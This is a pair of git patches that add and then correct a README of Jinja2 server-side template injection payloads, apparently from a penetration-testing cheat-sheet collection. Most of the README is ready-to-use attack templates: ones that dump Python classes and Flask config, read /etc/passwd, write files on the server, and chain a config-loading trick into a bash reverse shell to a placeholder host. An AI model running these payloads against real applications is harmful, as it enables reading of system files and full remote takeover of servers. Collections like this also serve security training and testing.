From 76b15d575e3598c44a6e89aad1984e77da3404f4 Mon Sep 17 00:00:00 2001 From: Soka Date: Sat, 1 Apr 2017 18:48:44 +0300 Subject: [PATCH 1/2] Add Template injections + Jinja template injection --- Template injections/README.md | 64 +++++++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 Template injections/README.md diff --git a/Template injections/README.md b/Template injections/README.md new file mode 100644 index 00000000..f1535c49 --- /dev/null +++ b/Template injections/README.md @@ -0,0 +1,64 @@ +# Templates Injections + +Template injection allows an attacker to include template code into an existant (or not) template. + +## Jinja2 +[Official website](http://jinja.pocoo.org/) +> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. + +Jinja2 is used by Python Web Frameworks such as Django or Flask. +The above injections have been tested on Flask application. +#### Template format +``` +{% extends "layout.html" %} +{% block body %} + +{% endblock %} + +``` + +#### Dump all used classes +``` +{{ ''.__class__.__mro__[2].__subclasses__() }} +``` + +#### Dump all config variables +```python +{% for key, value in config.iteritems() %} +
{{ key|e }}
+
{{ value|e }}
+{% endfor %} +``` + +#### Read remote file +``` +# ''.__class__.__mro__[2].__subclasses__()[40] = File class +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +``` + +#### Write into remote file +```python +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} +``` + +#### Remote Code Execution via reverse shell +Listen for connexion +``` +nv -lnvp 8000 +``` +Inject this template +```python +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config +{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config +{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host +``` + +#### Ressources & Sources +[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) + +#### Training +[https://w3challs.com/](https://w3challs.com/) \ No newline at end of file From bb98bd93395649c38e7a398c1ecbff5070fb6197 Mon Sep 17 00:00:00 2001 From: Soka Date: Sat, 1 Apr 2017 18:53:43 +0300 Subject: [PATCH 2/2] Add Template injections + Jinja template injection --- Template injections/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Template injections/README.md b/Template injections/README.md index f1535c49..59e9f3f7 100644 --- a/Template injections/README.md +++ b/Template injections/README.md @@ -53,7 +53,7 @@ nv -lnvp 8000 Inject this template ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config -{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config +{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` @@ -61,4 +61,4 @@ Inject this template [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) #### Training -[https://w3challs.com/](https://w3challs.com/) \ No newline at end of file +[https://w3challs.com/](https://w3challs.com/)